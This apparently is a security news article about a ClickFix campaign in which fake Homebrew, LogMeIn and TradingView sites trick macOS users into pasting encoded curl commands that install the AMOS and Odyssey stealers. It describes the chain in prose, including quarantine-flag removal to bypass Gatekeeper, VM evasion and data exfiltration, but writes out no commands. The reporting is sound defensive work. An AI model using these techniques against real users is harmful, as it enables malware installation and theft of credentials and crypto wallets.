A new malicious campaign is actively targeting macOS developers using fake websites for popular platforms like Homebrew, LogMeIn, and TradingView. This effort uses sophisticated social engineering, known as "ClickFix" techniques, to trick users into executing Terminal commands that install information-stealing malware such as AMOS (Atomic macOS Stealer) and Odyssey.
The ClickFix Infection
Researchers at Hunt.io identified over 85 domains impersonating the three legitimate platforms. In some cases, the threat actor used Google Ads to promote these malicious sites, ensuring they appeared prominently in search results for unsuspecting users.
The malicious sites feature convincing download portals and instruct users to copy a curl command into their Terminal to "install" the fake app. For platforms like TradingView, the command is disguised as a "connection security confirmation step." When the user clicks the copy button, however, their clipboard receives a base64-encoded installation command instead of a simple ID.
This command fetches and executes an install.sh file, which downloads the final binary payload. Crucially, the script removes quarantine flags to bypass Gatekeeper prompts, allowing the malware to execute without user approval.
Malware Execution and Evasion
The payload, either AMOS or Odyssey, first checks the environment to ensure it's not a virtual machine or analysis system before executing. To gain complete control, the malware explicitly invokes sudo to run commands as root.
Once launched, the malware collects detailed hardware and memory information and starts manipulating system services, such as killing the OneDrive updater daemons. It also interacts with macOS XPC services to blend its malicious activity with legitimate processes.
The information-stealing components then activate, harvesting sensitive data from browsers, cryptocurrency credentials, and other personal files before exfiltrating them to the command and control (C2) server. AMOS and Odyssey are powerful, modern stealers designed to steal a broad range of data. Users are strongly urged to never paste commands into their Terminal from online sources unless they fully understand the command’s function and trust the source completely.
Found this article interesting? Follow us on X(Twitter) ,Threads and FaceBook to read more exclusive content we post.
